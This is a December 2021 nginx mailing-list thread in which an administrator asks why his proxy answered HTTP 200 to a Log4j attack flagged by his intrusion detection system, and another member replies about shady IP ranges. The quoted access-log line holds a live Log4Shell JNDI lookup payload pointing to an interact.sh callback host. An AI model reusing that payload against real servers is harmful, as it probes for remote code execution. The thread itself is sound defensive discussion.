Help request about Log4j attack attempts and NGINX logs meaning

Mauro Tridici mauro.tridici at cmcc.it
Wed Dec 29 17:17:14 UTC 2021 

Thank you very much for your reply. I really appreciated it.
I’ll wait for the final gurus feedback too.

Mauro

> On 29 Dec 2021, at 18:03, lists <lists at lazygranch.com> wrote:
> 
> That IP space is certified shady. I detect the occasional hack from them. See 
> 
> https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/
> 
> and
> 
> https://wirelessdataspco.org/faq.php
> 
> These wireless companies will do anything for money including leasing their IP space. 
> 
> I don't block the IP space since it could be from normal users. Plus plenty of hacking comes from actual wireless providers customers. But I am appalled highly profitable wireless providers lease ipv4 space to hackers for what is pocket change for them. 
> 
> I will leave it up to the gurus to parse the log.  
> 
> 
> 
> 
> 
> 
> 	  Original Message  	
> 
> 
> From: mauro.tridici at cmcc.it
> Sent: December 29, 2021 6:55 AM
> To: nginx at nginx.org
> Reply-to: nginx at nginx.org
> Subject: Help request about Log4j attack attempts and NGINX logs meaning
> 
> 
> 
> 
> Dear Users,
> 
> 
> I have an old instance of NGINX (v.1.10.1) running as proxy server on a dedicated hardware platform.
> Since the proxy service is reachable from internet, it is constantly exposed to cyber attacks.
> In my particular case, it is attacked by a lot of Log4j attack attempts from several malicious IPs.
> 
> 
> At this moment, an host intrusion detection system (HIDS) is running and is protecting the NGINX server: it seems it is blocking every malicious attack attempts.
> Anyway, during the last attack mail notification sent by the HIDS, I noticed that the NGINX server response was “HTTP/1.1 200” and I’m very worried about it.
> Log4j and Java packages are NOT installed on the NGINX server and all the servers behind the proxy are not using Log4j.
> 
> 
> Could you please help me to understand the reason why the NGINX server answer was “HTTP/1.1 200”!?
> 
> 
> You can see below the mail notification I received:
> 
> 
> 
> Attack Notification.
> 2021 Dec 28 20:45:59
> 
> Received From: “hidden_NGINX_server_IP” >/var/log/nginx/access.log
> Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected."
> Src IP: 166.137.252.110
> Portion of the log(s):
> 
> 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET /?sulgz=${jndi:ldap://“hidden_NGINX_server_IP".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" “-"
> 
> 
> Thank you in advance,
> Mauro 
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx

More information about the nginx mailing list